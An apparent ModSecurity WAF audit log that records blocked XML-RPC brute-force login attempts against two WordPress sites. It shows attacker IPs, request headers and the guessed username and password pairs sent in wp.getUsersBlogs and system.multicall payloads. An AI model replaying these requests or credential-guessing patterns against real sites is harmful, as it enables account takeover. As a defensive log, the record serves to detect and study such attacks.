Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f83ecd08-Z-- --8878b615-A-- [05/Jun/2025:16:29:40 +0700] aEFjhOth7G2xELALzPZR2gAAANc 103.236.140.4 40572 103.236.140.4 8181 --8878b615-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8878b615-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix!23 --8878b615-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8878b615-E-- --8878b615-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115780460877 5291 (- - -) Stopwatch2: 1749115780460877 5291; combined=3879, p1=477, p2=3237, p3=0, p4=0, p5=98, sr=93, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8878b615-Z-- --d5a5aa53-A-- [05/Jun/2025:16:30:13 +0700] aEFjpSrHpfaS2Cuwh8UCwQAAAFM 103.236.140.4 40642 103.236.140.4 8181 --d5a5aa53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d5a5aa53-C-- wp.getUsersBlogs wakahumas admin234 --d5a5aa53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5a5aa53-E-- --d5a5aa53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (58+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115813400277 4662 (- - -) Stopwatch2: 1749115813400277 4662; combined=3439, p1=384, p2=2879, p3=0, p4=0, p5=102, sr=84, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5a5aa53-Z-- --8d196320-A-- [05/Jun/2025:16:30:16 +0700] aEFjqCrHpfaS2Cuwh8UCwgAAAFE 103.236.140.4 40660 103.236.140.4 8181 --8d196320-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8d196320-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehRashed@321 --8d196320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d196320-E-- --8d196320-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115816325097 4355 (- - -) Stopwatch2: 1749115816325097 4355; combined=3394, p1=379, p2=2850, p3=0, p4=0, p5=96, sr=78, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d196320-Z-- --a0f31173-A-- [05/Jun/2025:16:31:13 +0700] aEFj4VwdJdhOudw5hdz33AAAAIc 103.236.140.4 40864 103.236.140.4 8181 --a0f31173-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a0f31173-C-- wp.getUsersBlogs wakahumas 2003 --a0f31173-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0f31173-E-- --a0f31173-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115873492971 4344 (- - -) Stopwatch2: 1749115873492971 4344; combined=3326, p1=393, p2=2768, p3=0, p4=0, p5=96, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0f31173-Z-- --e8aa9552-A-- [05/Jun/2025:16:32:14 +0700] aEFkHn-K7ToMdu-YSIJQTwAAAAE 103.236.140.4 41086 103.236.140.4 8181 --e8aa9552-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e8aa9552-C-- wp.getUsersBlogs wakahumas 1235698 --e8aa9552-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8aa9552-E-- --e8aa9552-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115934673712 5364 (- - -) Stopwatch2: 1749115934673712 5364; combined=3782, p1=501, p2=3110, p3=0, p4=0, p5=101, sr=107, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8aa9552-Z-- --440dd011-A-- [05/Jun/2025:16:32:34 +0700] aEFkMirHpfaS2Cuwh8UDAgAAAEs 103.236.140.4 41142 103.236.140.4 8181 --440dd011-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --440dd011-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin1233 --440dd011-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --440dd011-E-- --440dd011-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115954007909 4532 (- - -) Stopwatch2: 1749115954007909 4532; combined=3491, p1=410, p2=2911, p3=0, p4=0, p5=99, sr=81, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --440dd011-Z-- --80417f7e-A-- [05/Jun/2025:16:33:14 +0700] aEFkWn-K7ToMdu-YSIJQXgAAAAQ 103.236.140.4 41184 103.236.140.4 8181 --80417f7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --80417f7e-C-- wp.getUsersBlogs wakahumas jessica --80417f7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80417f7e-E-- --80417f7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115994348767 4116 (- - -) Stopwatch2: 1749115994348767 4116; combined=3167, p1=340, p2=2654, p3=0, p4=0, p5=100, sr=79, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80417f7e-Z-- --e7c7cb6f-A-- [05/Jun/2025:16:34:14 +0700] aEFkluth7G2xELALzPZSTAAAANc 103.236.140.4 41328 103.236.140.4 8181 --e7c7cb6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e7c7cb6f-C-- wp.getUsersBlogs wakahumas samantha --e7c7cb6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7c7cb6f-E-- --e7c7cb6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (64+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116054345206 4138 (- - -) Stopwatch2: 1749116054345206 4138; combined=3203, p1=353, p2=2685, p3=0, p4=0, p5=96, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7c7cb6f-Z-- --7a2e297c-A-- [05/Jun/2025:16:35:14 +0700] aEFk0uth7G2xELALzPZStAAAAMk 103.236.140.4 41544 103.236.140.4 8181 --7a2e297c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --7a2e297c-C-- wp.getUsersBlogs wakahumas anthony1 --7a2e297c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a2e297c-E-- --7a2e297c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (98+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116114378680 4281 (- - -) Stopwatch2: 1749116114378680 4281; combined=3294, p1=339, p2=2780, p3=0, p4=0, p5=101, sr=80, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a2e297c-Z-- --a1f5e40b-A-- [05/Jun/2025:16:36:14 +0700] aEFlDuth7G2xELALzPZS2gAAAMw 103.236.140.4 41674 103.236.140.4 8181 --a1f5e40b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a1f5e40b-C-- wp.getUsersBlogs wakahumas peaches --a1f5e40b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1f5e40b-E-- --a1f5e40b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116174446662 4307 (- - -) Stopwatch2: 1749116174446662 4307; combined=3376, p1=342, p2=2799, p3=0, p4=0, p5=137, sr=78, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1f5e40b-Z-- --d4dfc642-A-- [05/Jun/2025:16:37:14 +0700] aEFlSirHpfaS2Cuwh8UDFAAAAEk 103.236.140.4 41746 103.236.140.4 8181 --d4dfc642-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d4dfc642-C-- wp.getUsersBlogs wakahumas liverpool1 --d4dfc642-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4dfc642-E-- --d4dfc642-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116234215521 4450 (- - -) Stopwatch2: 1749116234215521 4450; combined=3341, p1=337, p2=2812, p3=0, p4=0, p5=109, sr=78, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4dfc642-Z-- --32cae247-A-- [05/Jun/2025:16:38:15 +0700] aEFlhyrHpfaS2Cuwh8UDMAAAAEI 103.236.140.4 41944 103.236.140.4 8181 --32cae247-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --32cae247-C-- wp.getUsersBlogs wakahumas qwe --32cae247-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32cae247-E-- --32cae247-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116295039312 4935 (- - -) Stopwatch2: 1749116295039312 4935; combined=3753, p1=442, p2=3140, p3=0, p4=0, p5=101, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32cae247-Z-- --0e8d6335-A-- [05/Jun/2025:16:39:16 +0700] aEFlxCrHpfaS2Cuwh8UDNQAAAFM 103.236.140.4 42026 103.236.140.4 8181 --0e8d6335-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --0e8d6335-C-- wp.getUsersBlogs wakasarpras 12345 --0e8d6335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e8d6335-E-- --0e8d6335-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116356271662 4402 (- - -) Stopwatch2: 1749116356271662 4402; combined=3340, p1=359, p2=2811, p3=0, p4=0, p5=99, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e8d6335-Z-- --2a696465-A-- [05/Jun/2025:16:39:46 +0700] aEFl4irHpfaS2Cuwh8UDXAAAAFY 103.236.140.4 42126 103.236.140.4 8181 --2a696465-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2a696465-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin83 --2a696465-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a696465-E-- --2a696465-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749116386884262 4565 (- - -) Stopwatch2: 1749116386884262 4565; combined=3598, p1=355, p2=3084, p3=0, p4=0, p5=93, sr=77, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a696465-Z-- --5d6ae979-A-- [05/Jun/2025:16:40:21 +0700] aEFmBSrHpfaS2Cuwh8UDbQAAAEE 103.236.140.4 42206 103.236.140.4 8181 --5d6ae979-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5d6ae979-C-- wp.getUsersBlogs wakasarpras wakasarpras1994 --5d6ae979-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d6ae979-E-- --5d6ae979-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116421414462 5330 (- - -) Stopwatch2: 1749116421414462 5330; combined=3768, p1=461, p2=3135, p3=0, p4=0, p5=101, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d6ae979-Z-- --d3a7176d-A-- [05/Jun/2025:16:40:28 +0700] aEFmDOth7G2xELALzPZS-wAAAMg 103.236.140.4 42218 103.236.140.4 8181 --d3a7176d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.69.98.51 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.69.98.51 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d3a7176d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@456 --d3a7176d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3a7176d-E-- --d3a7176d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.69.98.51 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] 